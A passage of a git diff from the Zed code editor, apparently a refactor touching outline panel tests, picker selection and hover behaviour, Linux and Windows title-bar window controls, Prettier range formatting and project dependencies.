PanelEntry::Outline(OutlineEntry::Outline(outline)) if panel .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = - (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() @@ -8112,4 +7960,110 @@ outline: struct Foo <==== selected ); }); } + + #[gpui::test] + async fn test_markdown_outline_selection_at_heading_boundaries(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/test", + json!({ + "doc.md": indoc!(" + # Section A + + ## Sub Section A + + ## Sub Section B + + # Section B + + ") + }), + ) + .await; + + let project = Project::test(fs.clone(), [Path::new("/test")], cx).await; + project.read_with(cx, |project, _| project.languages().add(markdown_lang())); + let (window, workspace) = add_outline_panel(&project, cx).await; + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let outline_panel = outline_panel(&workspace, cx); + outline_panel.update_in(cx, |outline_panel, window, cx| { + outline_panel.set_active(true, window, cx) + }); + + let editor = workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_abs_path( + PathBuf::from("/test/doc.md"), + OpenOptions { + visible: Some(OpenVisible::All), + ..Default::default() + }, + window, + cx, + ) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + cx.run_until_parked(); + + outline_panel.update_in(cx, |panel, window, cx| { + panel.update_non_fs_items(window, cx); + panel.update_cached_entries(Some(UPDATE_DEBOUNCE), window, cx); + }); + + // Helper function to move the cursor to the first column of a given row + // and return the selected outline entry's text. + let move_cursor_and_get_selection = + |row: u32, cx: &mut VisualTestContext| -> Option { + cx.update(|window, cx| { + editor.update(cx, |editor, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges(Some( + language::Point::new(row, 0)..language::Point::new(row, 0), + )) + }); + }); + }); + + cx.run_until_parked(); + + outline_panel.read_with(cx, |panel, _cx| { + panel.selected_entry().and_then(|entry| match entry { + PanelEntry::Outline(OutlineEntry::Outline(outline)) => { + Some(outline.text.clone()) + } + _ => None, + }) + }) + }; + + assert_eq!( + move_cursor_and_get_selection(0, cx).as_deref(), + Some("# Section A"), + "Cursor at row 0 should select '# Section A'" + ); + + assert_eq!( + move_cursor_and_get_selection(2, cx).as_deref(), + Some("## Sub Section A"), + "Cursor at row 2 should select '## Sub Section A'" + ); + + assert_eq!( + move_cursor_and_get_selection(4, cx).as_deref(), + Some("## Sub Section B"), + "Cursor at row 4 should select '## Sub Section B'" + ); + + assert_eq!( + move_cursor_and_get_selection(6, cx).as_deref(), + Some("# Section B"), + "Cursor at row 6 should select '# Section B'" + ); + } } diff --git a/crates/outline_panel/src/outline_panel_settings.rs b/crates/outline_panel/src/outline_panel_settings.rs index b744ca6399dd16ad216d1cb4c6dda5e1d93baa4b..18f52e512da24ee986e9fe3f49ff5e3cd08c8b23 100644 --- a/crates/outline_panel/src/outline_panel_settings.rs +++ b/crates/outline_panel/src/outline_panel_settings.rs @@ -1,4 +1,4 @@ -use editor::EditorSettings; +use editor::{EditorSettings, ui_scrollbar_settings_from_raw}; use gpui::{App, Pixels}; use settings::RegisterSetting; pub use settings::{DockSide, Settings, ShowIndentGuides}; @@ -33,9 +33,13 @@ pub struct IndentGuidesSettings { pub show: ShowIndentGuides, } -impl ScrollbarVisibility for OutlinePanelSettings { +#[derive(Default)] +pub(crate) struct OutlinePanelSettingsScrollbarProxy; + +impl ScrollbarVisibility for OutlinePanelSettingsScrollbarProxy { fn visibility(&self, cx: &App) -> ShowScrollbar { - self.scrollbar + OutlinePanelSettings::get_global(cx) + .scrollbar .show .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } @@ -65,7 +69,11 @@ impl Settings for OutlinePanelSettings { auto_reveal_entries: panel.auto_reveal_entries.unwrap(), auto_fold_dirs: panel.auto_fold_dirs.unwrap(), scrollbar: ScrollbarSettings { - show: panel.scrollbar.unwrap().show.map(Into::into), + show: panel + .scrollbar + .unwrap() + .show + .map(ui_scrollbar_settings_from_raw), }, expand_outlines_with_depth: panel.expand_outlines_with_depth.unwrap(), } diff --git a/crates/panel/src/panel.rs b/crates/panel/src/panel.rs index 133efa9cb61c122af79a228cdfb74f86e22792b4..cf6465f3f5973bf24429f010dadf369346123b8f 100644 --- a/crates/panel/src/panel.rs +++ b/crates/panel/src/panel.rs @@ -52,7 +52,6 @@ pub fn panel_button(label: impl Into) -> ui::Button { let id = ElementId::Name(label.to_lowercase().replace(' ', "_").into()); ui::Button::new(id, label) .label_size(ui::LabelSize::Small) - .icon_size(ui::IconSize::Small) // TODO: Change this once we use on_surface_bg in button_like .layer(ui::ElevationIndex::ModalSurface) .size(ui::ButtonSize::Compact) diff --git a/crates/paths/src/paths.rs b/crates/paths/src/paths.rs index 656188e249fc864e1328c8f458bdc46aa7eaea3a..c9b9c756217281d587491aac5cac81e7cd0baaf2 100644 --- a/crates/paths/src/paths.rs +++ b/crates/paths/src/paths.rs @@ -310,30 +310,6 @@ pub fn snippets_dir() -> &'static PathBuf { SNIPPETS_DIR.get_or_init(|| config_dir().join("snippets")) } -// Returns old path to contexts directory. -// Fallback -fn text_threads_dir_fallback() -> &'static PathBuf { - static CONTEXTS_DIR: OnceLock = OnceLock::new(); - CONTEXTS_DIR.get_or_init(|| { - if cfg!(target_os = "macos") { - config_dir().join("conversations") - } else { - data_dir().join("conversations") - } - }) -} -/// Returns the path to the contexts directory. -/// -/// This is where the saved contexts from the Assistant are stored. -pub fn text_threads_dir() -> &'static PathBuf { - let fallback_dir = text_threads_dir_fallback(); - if fallback_dir.exists() { - return fallback_dir; - } - static CONTEXTS_DIR: OnceLock = OnceLock::new(); - CONTEXTS_DIR.get_or_init(|| state_dir().join("conversations")) -} - /// Returns the path to the contexts directory. /// /// This is where the prompts for use with the Assistant are stored. @@ -419,12 +395,6 @@ pub fn copilot_dir() -> &'static PathBuf { COPILOT_DIR.get_or_init(|| data_dir().join("copilot")) } -/// Returns the path to the Supermaven directory. -pub fn supermaven_dir() -> &'static PathBuf { - static SUPERMAVEN_DIR: OnceLock = OnceLock::new(); - SUPERMAVEN_DIR.get_or_init(|| data_dir().join("supermaven")) -} - /// Returns the path to the default Prettier directory. pub fn default_prettier_dir() -> &'static PathBuf { static DEFAULT_PRETTIER_DIR: OnceLock = OnceLock::new(); diff --git a/crates/picker/Cargo.toml b/crates/picker/Cargo.toml index f85c55b9f27bcb8fd87101c341058e1a3962934e..7c01e8bfaa13447eccb42f42f69a09b332193676 100644 --- a/crates/picker/Cargo.toml +++ b/crates/picker/Cargo.toml @@ -22,14 +22,13 @@ menu.workspace = true schemars.workspace = true serde.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true ui_input.workspace = true workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -ctor.workspace = true editor = { workspace = true, features = ["test-support"] } -env_logger.workspace = true gpui = { workspace = true, features = ["test-support"] } -serde_json.workspace = true +settings.workspace = true diff --git a/crates/picker/src/picker.rs b/crates/picker/src/picker.rs index 716653d89642fe6d8f457f145ed15b8972432a09..eba5b3096194fe8a3379efeb9b230a6004cd2e36 100644 --- a/crates/picker/src/picker.rs +++ b/crates/picker/src/picker.rs @@ -16,7 +16,7 @@ use serde::Deserialize; use std::{ cell::Cell, cell::RefCell, collections::HashMap, ops::Range, rc::Rc, sync::Arc, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Color, Divider, DocumentationAside, DocumentationSide, Label, ListItem, ListItemSpacing, ScrollAxes, Scrollbars, WithScrollbar, prelude::*, utils::WithRemSize, v_flex, @@ -114,13 +114,16 @@ pub trait PickerDelegate: Sized + 'static { None } fn can_select( - &mut self, + &self, _ix: usize, _window: &mut Window, _cx: &mut Context>, ) -> bool { true } + fn select_on_hover(&self) -> bool { + true + } // Allows binding some optional effect to when the selection changes. fn selected_index_changed( @@ -619,6 +622,9 @@ impl Picker { ) { cx.stop_propagation(); window.prevent_default(); + if !self.delegate.can_select(ix, window, cx) { + return; + } self.set_selected_index(ix, None, false, window, cx); self.do_confirm(secondary, window, cx) } @@ -753,10 +759,11 @@ impl Picker { ix: usize, ) -> impl IntoElement + use { let item_bounds = self.item_bounds.clone(); + let selectable = self.delegate.can_select(ix, window, cx); div() .id(("item", ix)) - .cursor_pointer() + .when(selectable, |this| this.cursor_pointer()) .child( canvas( move |bounds, _window, _cx| { @@ -784,6 +791,14 @@ impl Picker { this.handle_click(ix, event.modifiers.platform, window, cx) }), ) + .when(self.delegate.select_on_hover(), |this| { + this.on_hover(cx.listener(move |this, hovered: &bool, window, cx| { + if *hovered { + this.set_selected_index(ix, None, false, window, cx); + cx.notify(); + } + })) + }) .children(self.delegate.render_match( ix, ix == self.delegate.selected_index(), @@ -850,6 +865,175 @@ impl Picker { } } +#[cfg(test)] +mod tests { + use super::*; + use gpui::TestAppContext; + use std::cell::Cell; + + struct TestDelegate { + items: Vec, + selected_index: usize, + confirmed_index: Rc>>, + } + + impl TestDelegate { + fn new(items: Vec) -> Self { + Self { + items, + selected_index: 0, + confirmed_index: Rc::new(Cell::new(None)), + } + } + } + + impl PickerDelegate for TestDelegate { + type ListItem = ui::ListItem; + + fn match_count(&self) -> usize { + self.items.len() + } + + fn selected_index(&self) -> usize { + self.selected_index + } + + fn set_selected_index( + &mut self, + ix: usize, + _window: &mut Window, + _cx: &mut Context>, + ) { + self.selected_index = ix; + } + + fn can_select( + &self, + ix: usize, + _window: &mut Window, + _cx: &mut Context>, + ) -> bool { + self.items.get(ix).copied().unwrap_or(false) + } + + fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { + "Test".into() + } + + fn update_matches( + &mut self, + _query: String, + _window: &mut Window, + _cx: &mut Context>, + ) -> Task<()> { + Task::ready(()) + } + + fn confirm( + &mut self, + _secondary: bool, + _window: &mut Window, + _cx: &mut Context>, + ) { + self.confirmed_index.set(Some(self.selected_index)); + } + + fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context>) {} + + fn render_match( + &self, + ix: usize, + selected: bool, + _window: &mut Window, + _cx: &mut Context>, + ) -> Option { + Some( + ui::ListItem::new(ix) + .inset(true) + .toggle_state(selected) + .child(ui::Label::new(format!("Item {ix}"))), + ) + } + } + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let store = settings::SettingsStore::test(cx); + cx.set_global(store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + editor::init(cx); + }); + } + + #[gpui::test] + async fn test_clicking_non_selectable_item_does_not_confirm(cx: &mut TestAppContext) { + init_test(cx); + + let confirmed_index = Rc::new(Cell::new(None)); + let (picker, cx) = cx.add_window_view(|window, cx| { + let mut delegate = TestDelegate::new(vec![true, false, true]); + delegate.confirmed_index = confirmed_index.clone(); + Picker::uniform_list(delegate, window, cx) + }); + + picker.update(cx, |picker, _cx| { + assert_eq!(picker.delegate.selected_index(), 0); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.handle_click(1, false, window, cx); + }); + assert!( + confirmed_index.get().is_none(), + "clicking a non-selectable item should not confirm" + ); + + picker.update_in(cx, |picker, window, cx| { + picker.handle_click(0, false, window, cx); + }); + assert_eq!( + confirmed_index.get(), + Some(0), + "clicking a selectable item should confirm" + ); + } + + #[gpui::test] + async fn test_keyboard_navigation_skips_non_selectable_items(cx: &mut TestAppContext) { + init_test(cx); + + let (picker, cx) = cx.add_window_view(|window, cx| { + Picker::uniform_list(TestDelegate::new(vec![true, false, true]), window, cx) + }); + + picker.update(cx, |picker, _cx| { + assert_eq!(picker.delegate.selected_index(), 0); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.select_next(&menu::SelectNext, window, cx); + }); + picker.update(cx, |picker, _cx| { + assert_eq!( + picker.delegate.selected_index(), + 2, + "select_next should skip non-selectable item at index 1" + ); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.select_previous(&menu::SelectPrevious, window, cx); + }); + picker.update(cx, |picker, _cx| { + assert_eq!( + picker.delegate.selected_index(), + 0, + "select_previous should skip non-selectable item at index 1" + ); + }); + } +} + impl EventEmitter for Picker {} impl ModalView for Picker {} diff --git a/crates/platform_title_bar/Cargo.toml b/crates/platform_title_bar/Cargo.toml index 43ad6166929bc463edbea878941ba19ffe2ea3a9..7ecc624a3224025749b65d631031e3e8bf639052 100644 --- a/crates/platform_title_bar/Cargo.toml +++ b/crates/platform_title_bar/Cargo.toml @@ -19,6 +19,7 @@ project.workspace = true settings.workspace = true smallvec.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true workspace.workspace = true zed_actions.workspace = true diff --git a/crates/platform_title_bar/src/platform_title_bar.rs b/crates/platform_title_bar/src/platform_title_bar.rs index 7053fe89e7fdc6ece9ad50fdd8facaf31dba3086..c009d146403b21e592457d0c9a3f24819e80d642 100644 --- a/crates/platform_title_bar/src/platform_title_bar.rs +++ b/crates/platform_title_bar/src/platform_title_bar.rs @@ -1,11 +1,11 @@ -mod platforms; +pub mod platforms; mod system_window_tabs; use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt}; use gpui::{ - AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement, - MouseButton, ParentElement, StatefulInteractiveElement, Styled, Window, WindowControlArea, div, - px, + Action, AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement, + MouseButton, ParentElement, StatefulInteractiveElement, Styled, WeakEntity, Window, + WindowButtonLayout, WindowControlArea, div, px, }; use project::DisableAiSettings; use settings::Settings; @@ -15,6 +15,7 @@ use ui::{ prelude::*, utils::{TRAFFIC_LIGHT_PADDING, platform_title_bar_height}, }; +use workspace::{MultiWorkspace, SidebarRenderState, SidebarSide}; use crate::{ platforms::{platform_linux, platform_windows}, @@ -31,8 +32,8 @@ pub struct PlatformTitleBar { children: SmallVec<[AnyElement; 2]>, should_move: bool, system_window_tabs: Entity, - workspace_sidebar_open: bool, - sidebar_has_notifications: bool, + button_layout: Option, + multi_workspace: Option>, } impl PlatformTitleBar { @@ -46,11 +47,20 @@ impl PlatformTitleBar { children: SmallVec::new(), should_move: false, system_window_tabs, - workspace_sidebar_open: false, - sidebar_has_notifications: false, + button_layout: None, + multi_workspace: None, } } + pub fn with_multi_workspace(mut self, multi_workspace: WeakEntity) -> Self { + self.multi_workspace = Some(multi_workspace); + self + } + + pub fn set_multi_workspace(&mut self, multi_workspace: WeakEntity) { + self.multi_workspace = Some(multi_workspace); + } + pub fn title_bar_color(&self, window: &mut Window, cx: &mut Context) -> Hsla { if cfg!(any(target_os = "linux", target_os = "freebsd")) { if window.is_window_active() && !self.should_move { @@ -70,34 +80,104 @@ impl PlatformTitleBar { self.children = children.into_iter().collect(); } + pub fn set_button_layout(&mut self, button_layout: Option) { + self.button_layout = button_layout; + } + + fn effective_button_layout( + &self, + decorations: &Decorations, + cx: &App, + ) -> Option { + if self.platform_style == PlatformStyle::Linux + && matches!(decorations, Decorations::Client { .. }) + { + self.button_layout.or_else(|| cx.button_layout()) + } else { + None + } + } + pub fn init(cx: &mut App) { SystemWindowTabs::init(cx); } - pub fn is_workspace_sidebar_open(&self) -> bool { - self.workspace_sidebar_open + fn sidebar_render_state(&self, cx: &App) -> SidebarRenderState { + self.multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| mw.read(cx).sidebar_render_state(cx)) + .unwrap_or_default() } - pub fn set_workspace_sidebar_open(&mut self, open: bool, cx: &mut Context) { - self.workspace_sidebar_open = open; - cx.notify(); + pub fn is_multi_workspace_enabled(cx: &App) -> bool { + cx.has_flag::() && !DisableAiSettings::get_global(cx).disable_ai } +} - pub fn sidebar_has_notifications(&self) -> bool { - self.sidebar_has_notifications +/// Renders the platform-appropriate left-side window controls (e.g. Ubuntu/GNOME close button). +/// +/// Only relevant on Linux with client-side decorations when the window manager +/// places controls on the left. +pub fn render_left_window_controls( + button_layout: Option, + close_action: Box, + window: &Window, +) -> Option { + if PlatformStyle::platform() != PlatformStyle::Linux { + return None; } - - pub fn set_sidebar_has_notifications( - &mut self, - has_notifications: bool, - cx: &mut Context, - ) { - self.sidebar_has_notifications = has_notifications; - cx.notify(); + if !matches!(window.window_decorations(), Decorations::Client { .. }) { + return None; } + let button_layout = button_layout?; + if button_layout.left[0].is_none() { + return None; + } + Some( + platform_linux::LinuxWindowControls::new( + "left-window-controls", + button_layout.left, + close_action, + ) + .into_any_element(), + ) +} - pub fn is_multi_workspace_enabled(cx: &App) -> bool { - cx.has_flag::() && !DisableAiSettings::get_global(cx).disable_ai +/// Renders the platform-appropriate right-side window controls (close, minimize, maximize). +/// +/// Returns `None` on Mac or when the platform doesn't need custom controls +/// (e.g. Linux with server-side decorations). +pub fn render_right_window_controls( + button_layout: Option, + close_action: Box, + window: &Window, +) -> Option { + let decorations = window.window_decorations(); + let height = platform_title_bar_height(window); + + match PlatformStyle::platform() { + PlatformStyle::Linux => { + if !matches!(decorations, Decorations::Client { .. }) { + return None; + } + let button_layout = button_layout?; + if button_layout.right[0].is_none() { + return None; + } + Some( + platform_linux::LinuxWindowControls::new( + "right-window-controls", + button_layout.right, + close_action, + ) + .into_any_element(), + ) + } + PlatformStyle::Windows => { + Some(platform_windows::WindowsWindowControls::new(height).into_any_element()) + } + PlatformStyle::Mac => None, } } @@ -110,8 +190,8 @@ impl Render for PlatformTitleBar { let close_action = Box::new(workspace::CloseWindow); let children = mem::take(&mut self.children); - let is_multiworkspace_sidebar_open = - PlatformTitleBar::is_multi_workspace_enabled(cx) && self.is_workspace_sidebar_open(); + let button_layout = self.effective_button_layout(&decorations, cx); + let sidebar = self.sidebar_render_state(cx); let title_bar = h_flex() .window_control_area(WindowControlArea::Drag) @@ -159,12 +239,23 @@ impl Render for PlatformTitleBar { }) }) .map(|this| { + let show_left_controls = !(sidebar.open && sidebar.side == SidebarSide::Left); + if window.is_fullscreen() { this.pl_2() - } else if self.platform_style == PlatformStyle::Mac - && !is_multiworkspace_sidebar_open - { + } else if self.platform_style == PlatformStyle::Mac && show_left_controls { this.pl(px(TRAFFIC_LIGHT_PADDING)) + } else if let Some(controls) = show_left_controls + .then(|| { + render_left_window_controls( + button_layout, + close_action.as_ref().boxed_clone(), + window, + ) + }) + .flatten() + { + this.child(controls) } else { this.pl_2() } @@ -172,11 +263,14 @@ impl Render for PlatformTitleBar { .map(|el| match decorations { Decorations::Server => el, Decorations::Client { tiling, .. } => el - .when(!(tiling.top || tiling.right), |el| { - el.rounded_tr(theme::CLIENT_SIDE_DECORATION_ROUNDING) - }) .when( - !(tiling.top || tiling.left) && !is_multiworkspace_sidebar_open, + !(tiling.top || tiling.right) + && !(sidebar.open && sidebar.side == SidebarSide::Right), + |el| el.rounded_tr(theme::CLIENT_SIDE_DECORATION_ROUNDING), + ) + .when( + !(tiling.top || tiling.left) + && !(sidebar.open && sidebar.side == SidebarSide::Left), |el| el.rounded_tl(theme::CLIENT_SIDE_DECORATION_ROUNDING), ) // this border is to avoid a transparent gap in the rounded corners @@ -199,25 +293,30 @@ impl Render for PlatformTitleBar { .children(children), ) .when(!window.is_fullscreen(), |title_bar| { - match self.platform_style { - PlatformStyle::Mac => title_bar, - PlatformStyle::Linux => { - if matches!(decorations, Decorations::Client { .. }) { - title_bar - .child(platform_linux::LinuxWindowControls::new(close_action)) - .when(supported_controls.window_menu, |titlebar| { - titlebar - .on_mouse_down(MouseButton::Right, move |ev, window, _| { - window.show_window_menu(ev.position) - }) - }) - } else { - title_bar - } - } - PlatformStyle::Windows => { - title_bar.child(platform_windows::WindowsWindowControls::new(height)) - } + let show_right_controls = !(sidebar.open && sidebar.side == SidebarSide::Right); + + let title_bar = title_bar.children( + show_right_controls + .then(|| { + render_right_window_controls( + button_layout, + close_action.as_ref().boxed_clone(), + window, + ) + }) + .flatten(), + ); + + if self.platform_style == PlatformStyle::Linux + && matches!(decorations, Decorations::Client { .. }) + { + title_bar.when(supported_controls.window_menu, |titlebar| { + titlebar.on_mouse_down(MouseButton::Right, move |ev, window, _| { + window.show_window_menu(ev.position) + }) + }) + } else { + title_bar } }); diff --git a/crates/platform_title_bar/src/platforms/platform_linux.rs b/crates/platform_title_bar/src/platforms/platform_linux.rs index 0e7af80f80e8dcbea03a3b3375f1e4dfd7ca2f37..8dd6c6f6787ddab703963188beaaae1288ca6d6f 100644 --- a/crates/platform_title_bar/src/platforms/platform_linux.rs +++ b/crates/platform_title_bar/src/platforms/platform_linux.rs @@ -1,46 +1,83 @@ -use gpui::{Action, Hsla, MouseButton, prelude::*, svg}; +use gpui::{ + Action, AnyElement, Hsla, MAX_BUTTONS_PER_SIDE, MouseButton, WindowButton, prelude::*, svg, +}; use ui::prelude::*; #[derive(IntoElement)] pub struct LinuxWindowControls { - close_window_action: Box, + id: &'static str, + buttons: [Option; MAX_BUTTONS_PER_SIDE], + close_action: Box, } impl LinuxWindowControls { - pub fn new(close_window_action: Box) -> Self { + pub fn new( + id: &'static str, + buttons: [Option; MAX_BUTTONS_PER_SIDE], + close_action: Box, + ) -> Self { Self { - close_window_action, + id, + buttons, + close_action, } } } impl RenderOnce for LinuxWindowControls { fn render(self, window: &mut Window, cx: &mut App) -> impl IntoElement { + let is_maximized = window.is_maximized(); + let supported_controls = window.window_controls(); + let button_elements: Vec = self + .buttons + .iter() + .filter_map(|b| *b) + .filter(|button| match button { + WindowButton::Minimize => supported_controls.minimize, + WindowButton::Maximize => supported_controls.maximize, + WindowButton::Close => true, + }) + .map(|button| { + create_window_button(button, button.id(), is_maximized, &*self.close_action, cx) + }) + .collect(); + h_flex() - .id("generic-window-controls") - .px_3() - .gap_3() - .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) - .child(WindowControl::new( - "minimize", - WindowControlType::Minimize, - cx, - )) - .child(WindowControl::new( - "maximize-or-restore", - if window.is_maximized() { - WindowControlType::Restore - } else { - WindowControlType::Maximize - }, - cx, - )) - .child(WindowControl::new_close( - "close", - WindowControlType::Close, - self.close_window_action, - cx, - )) + .id(self.id) + .when(!button_elements.is_empty(), |el| { + el.gap_3() + .px_3() + .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) + .children(button_elements) + }) + } +} + +fn create_window_button( + button: WindowButton, + id: &'static str, + is_maximized: bool, + close_action: &dyn Action, + cx: &mut App, +) -> AnyElement { + match button { + WindowButton::Minimize => { + WindowControl::new(id, WindowControlType::Minimize, cx).into_any_element() + } + WindowButton::Maximize => WindowControl::new( + id, + if is_maximized { + WindowControlType::Restore + } else { + WindowControlType::Maximize + }, + cx, + ) + .into_any_element(), + WindowButton::Close => { + WindowControl::new_close(id, WindowControlType::Close, close_action.boxed_clone(), cx) + .into_any_element() + } } } diff --git a/crates/platform_title_bar/src/system_window_tabs.rs b/crates/platform_title_bar/src/system_window_tabs.rs index a9bf46cc4f9f33586d1129dec1c64a67f1e42198..f465d2ab8476eb1c834f32e1d0eb72cc468dc230 100644 --- a/crates/platform_title_bar/src/system_window_tabs.rs +++ b/crates/platform_title_bar/src/system_window_tabs.rs @@ -5,7 +5,7 @@ use gpui::{ Styled, SystemWindowTab, SystemWindowTabController, Window, WindowId, actions, canvas, div, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Color, ContextMenu, DynamicSpacing, IconButton, IconButtonShape, IconName, IconSize, Label, LabelSize, Tab, h_flex, prelude::*, right_click_menu, diff --git a/crates/prettier/src/prettier.rs b/crates/prettier/src/prettier.rs index 90f512a5931fa89ac9b8a2216091f3633f872b6b..be4b35a6450eec645fde1343d4e9d27f0a695ef1 100644 --- a/crates/prettier/src/prettier.rs +++ b/crates/prettier/src/prettier.rs @@ -2,14 +2,14 @@ use anyhow::Context as _; use collections::{HashMap, HashSet}; use fs::Fs; use gpui::{AsyncApp, Entity}; -use language::language_settings::PrettierSettings; -use language::{Buffer, Diff, Language, language_settings::language_settings}; +use language::language_settings::{LanguageSettings, PrettierSettings}; +use language::{Buffer, Diff, Language, OffsetUtf16}; use lsp::{LanguageServer, LanguageServerId}; use node_runtime::NodeRuntime; use paths::default_prettier_dir; use serde::{Deserialize, Serialize}; use std::{ - ops::ControlFlow, + ops::{ControlFlow, Range}, path::{Path, PathBuf}, sync::Arc, time::Duration, @@ -48,6 +48,8 @@ const TAILWIND_PRETTIER_PLUGIN_PACKAGE_NAME: &str = "prettier-plugin-tailwindcss #[cfg(any(test, feature = "test-support"))] pub const FORMAT_SUFFIX: &str = "\nformatted by test prettier"; +#[cfg(any(test, feature = "test-support"))] +pub const RANGE_FORMAT_SUFFIX: &str = "\nrange formatted by test prettier"; impl Prettier { pub const CONFIG_FILE_NAMES: &'static [&'static str] = &[ @@ -348,6 +350,7 @@ impl Prettier { buffer: &Entity, buffer_path: Option, ignore_dir: Option, + range_utf16: Option>, request_timeout: Duration, cx: &mut AsyncApp, ) -> anyhow::Result { @@ -356,7 +359,7 @@ impl Prettier { let params = buffer .update(cx, |buffer, cx| { let buffer_language = buffer.language().map(|language| language.as_ref()); - let language_settings = language_settings(buffer_language.map(|l| l.name()), buffer.file(), cx); + let language_settings = LanguageSettings::for_buffer(&buffer, cx); let prettier_settings = &language_settings.prettier; anyhow::ensure!( prettier_settings.allowed, @@ -478,6 +481,8 @@ impl Prettier { plugins, prettier_options, ignore_path, + range_start: range_utf16.as_ref().map(|r| r.start.0), + range_end: range_utf16.as_ref().map(|r| r.end.0), }, }) }) @@ -501,15 +506,9 @@ impl Prettier { { Some("rust") => anyhow::bail!("prettier does not support Rust"), Some(_other) => { - let mut formatted_text = buffer.text() + FORMAT_SUFFIX; - let buffer_language = buffer.language().map(|language| language.as_ref()); - let language_settings = language_settings( - buffer_language.map(|l| l.name()), - buffer.file(), - cx, - ); + let language_settings = LanguageSettings::for_buffer(buffer, cx); let prettier_settings = &language_settings.prettier; let parser = prettier_parser_name( buffer_path.as_deref(), @@ -517,9 +516,29 @@ impl Prettier { prettier_settings, )?; - if let Some(parser) = parser { - formatted_text = format!("{formatted_text}\n{parser}"); - } + let formatted_text = if let Some(range) = &range_utf16 { + let text = buffer.text(); + let start_byte = buffer.offset_utf16_to_offset(range.start); + let insert_at = text[start_byte..] + .find('\n') + .map(|pos| start_byte + pos) + .unwrap_or(text.len()); + let mut suffix = RANGE_FORMAT_SUFFIX.to_string(); + if let Some(parser) = &parser { + suffix = format!("{suffix}\n{parser}"); + } + let mut result = String::new(); + result.push_str(&text[..insert_at]); + result.push_str(&suffix); + result.push_str(&text[insert_at..]); + result + } else { + let mut text = buffer.text() + FORMAT_SUFFIX; + if let Some(parser) = &parser { + text = format!("{text}\n{parser}"); + } + text + }; Ok(buffer.diff(formatted_text, cx)) } @@ -655,6 +674,10 @@ struct FormatOptions { path: Option, prettier_options: Option>, ignore_path: Option, + #[serde(skip_serializing_if = "Option::is_none")] + range_start: Option, + #[serde(skip_serializing_if = "Option::is_none")] + range_end: Option, } #[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)] diff --git a/crates/prettier/src/prettier_server.js b/crates/prettier/src/prettier_server.js index b3d8a660a40d6f629ba63847f5e00d91046b7cd7..917095fea6896f18459b9ba024dfc183a1e28314 100644 --- a/crates/prettier/src/prettier_server.js +++ b/crates/prettier/src/prettier_server.js @@ -199,12 +199,21 @@ async function handleMessage(message, prettier) { ? resolvedConfig.plugins : params.options.plugins; + const rangeOptions = {}; + if (params.options.rangeStart != null) { + rangeOptions.rangeStart = params.options.rangeStart; + } + if (params.options.rangeEnd != null) { + rangeOptions.rangeEnd = params.options.rangeEnd; + } + const options = { ...(params.options.prettierOptions || prettier.config), ...resolvedConfig, plugins, parser: params.options.parser, filepath: params.options.filepath, + ...rangeOptions }; process.stderr.write( `Resolved config: ${JSON.stringify(resolvedConfig)}, will format file '${ diff --git a/crates/project/Cargo.toml b/crates/project/Cargo.toml index cbcd5481ee3c48655fc78e17d5cf65d2ec978a09..cd037786a399eb979fd5d9053c57efe3100dd473 100644 --- a/crates/project/Cargo.toml +++ b/crates/project/Cargo.toml @@ -31,7 +31,6 @@ test-support = [ "worktree/test-support", "gpui/test-support", "dap/test-support", - "dap_adapters/test-support", ] [dependencies] @@ -46,6 +45,7 @@ client.workspace = true clock.workspace = true collections.workspace = true context_server.workspace = true +credentials_provider.workspace = true dap.workspace = true extension.workspace = true fancy-regex.workspace = true @@ -92,11 +92,13 @@ terminal.workspace = true text.workspace = true toml.workspace = true url.workspace = true +percent-encoding.workspace = true util.workspace = true watch.workspace = true wax.workspace = true which.workspace = true worktree.workspace = true +zed_credentials_provider.workspace = true zeroize.workspace = true zlog.workspace = true ztracing.workspace = true @@ -105,12 +107,10 @@ tracing.workspace = true [dev-dependencies] client = { workspace = true, features = ["test-support"] } encoding_rs.workspace = true -db = { workspace = true, features = ["test-support"] } collections = { workspace = true, features = ["test-support"] } context_server = { workspace = true, features = ["test-support"] } buffer_diff = { workspace = true, features = ["test-support"] } dap = { workspace = true, features = ["test-support"] } -dap_adapters = { workspace = true, features = ["test-support"] } fs = { workspace = true, features = ["test-support"] } git2.workspace = true gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/project/src/agent_registry_store.rs b/crates/project/src/agent_registry_store.rs index a6fc56b7dadaeb0e89443479c108d999d70b37bd..b2010da65d9477859eceab166de6e0819617e4da 100644 --- a/crates/project/src/agent_registry_store.rs +++ b/crates/project/src/agent_registry_store.rs @@ -11,18 +11,19 @@ use http_client::{AsyncBody, HttpClient}; use serde::Deserialize; use settings::Settings as _; -use crate::agent_server_store::AllAgentServersSettings; +use crate::{AgentId, DisableAiSettings}; const REGISTRY_URL: &str = "https://cdn.agentclientprotocol.com/registry/v1/latest/registry.json"; const REFRESH_THROTTLE_DURATION: Duration = Duration::from_secs(60 * 60); #[derive(Clone, Debug)] 